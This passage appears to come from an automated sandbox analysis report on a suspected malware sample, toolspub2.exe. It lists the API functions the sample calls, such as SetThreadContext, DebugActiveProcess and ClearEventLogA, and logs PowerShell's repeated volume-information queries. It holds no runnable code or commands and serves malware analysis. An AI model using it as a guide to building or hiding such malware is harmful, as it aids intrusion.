                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: CharUpperW,CharToOemBuffA,CharToOemBuffA,AddConsoleAliasW,GetAltTabInfoA,DrawCaption,WinHttpGetProxyForUrl,SetThreadContext,GetFileAttributesExA,DragAcceptFiles,CoGetInstanceFromFile,__putw,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,FindNextVolumeMountPointA,GlobalAlloc,GetWindowsDirectoryW,SetThreadIdealProcessor,GetWindowsDirectoryW,SetThreadIdealProcessor,ReadConsoleOutputCharacterW,FatalAppExitW,BuildCommDCBAndTimeoutsA,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,SetConsoleCP,FindAtomW,GetTempPathA,CompareStringA,GetCurrentDirectoryW,lstrlenW,GetLocaleInfoW,GetCommConfig,CancelIo,_hread,CreateHardLinkA,ConvertFiberToThread,DeleteVolumeMountPointA,EnumSystemCodePagesA,GetEnvironmentStringsW,InterlockedIncrement,InterlockedDecrement,GetProcessVersion,SetLocaleInfoA,_hread,_hread,_hread,ReadConsoleInputW,GetPrivateProfileIntW,GetConsoleAliasExesA,OpenJobObjectA,SetTapeParameters,CreateNamedPipeW,BuildCommDCBAndTimeoutsW,VerSetConditionMask,GetCurrencyFormatW,lstrcpyA,ExitProcess,WriteConsoleInputW,GetFileAttributesA,GetStringTypeW,GetPrivateProfileStringA,OpenSemaphoreA,WriteConsoleOutputW,WriteConsoleInputW,AddConsoleAliasW,HeapCreate,DeleteFileA,WriteConsoleInputW,GetFileAttributesA,WaitNamedPipeW,GetCalendarInfoW,CreateDirectoryExW,GetModuleHandleA,SetThreadLocale,_hread,GetCurrentProcess,MoveFileWithProgressA,HeapFree,EnumSystemCodePagesA,FoldStringA,SetFileShortNameW,InterlockedPushEntrySList,QueryDosDeviceA,BuildCommDCBAndTimeoutsW,QueryPerformanceFrequency,FindNextFileW,SetCommState,VerifyVersionInfoW,FindNextVolumeMountPointW,SetCalendarInfoA,GetShortPathNameW,GetVolumePathNameW,GetVolumeNameForVolumeMountPointA,GetConsoleAliasesLengthA,TlsFree,GetDriveTypeW,SetComputerNameA,Process32FirstW,GetFileAttributesA,GetStringTypeW,GetStringTypeW,GetDriveTypeA,GetSystemWindowsDirectoryA,InterlockedPopEntrySList,EnumSystemLocalesW,GetCommState,IsWow64Process,GetSystemDirectoryA,GetTempPathW,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleMode,VirtualProtect,InterlockedIncrement,GetCharWidthFloatA,InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,3_2_00429C40
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_0040DC66
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_0040FC68
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_00413472
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_0040E8C2
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_TestDefaultLanguage,3_2_0040FCC3
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,3_2_004138F7
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_0041354C
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: GetLocaleInfoA,3_2_0040A938
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0040A274
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0040FACC
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0040FE94
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_0040BE95
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,3_2_0040FF54
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0040FBC1
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,3_2_0040FFF7
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_0040EBB0
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,3_2_0040FFBB
                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
